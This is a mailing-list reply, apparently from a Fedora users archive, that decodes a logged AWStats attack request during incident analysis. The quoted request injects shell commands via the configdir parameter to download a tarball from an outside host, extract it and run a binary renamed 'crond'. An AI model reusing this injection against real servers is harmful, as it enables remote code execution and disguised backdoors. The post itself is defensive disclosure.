Re: Security Breach

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 




Replace the url-encoded characters and you get:

/cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;cd /tmp;curl -0 wget
zburchi.idilis.ro/badboy.tar.gz;tar -zxvf badboy.tar.gz;cd psybnc;mv
mech crond;export PATH=;crond;echo e_exp;%00

So the attacker has tricked the script into executing a set of shell
commands, which include changing directory to /tmp, downloading a
tarball from a Romanian site, extracting that tarball and then executing
a program from the downloaded and extracted tarball, after renaming it
to "crond" in an effort to disguise it.

Damned fine research. Good job; I'm impressed.


I have reported this to awstats.  Thanks for your help everybody.

-cs


[Index of Archives]     [Current Fedora Users]     [Fedora Desktop]     [Fedora SELinux]     [Yosemite News]     [Yosemite Photos]     [KDE Users]     [Fedora Tools]     [Fedora Docs]

  Powered by Linux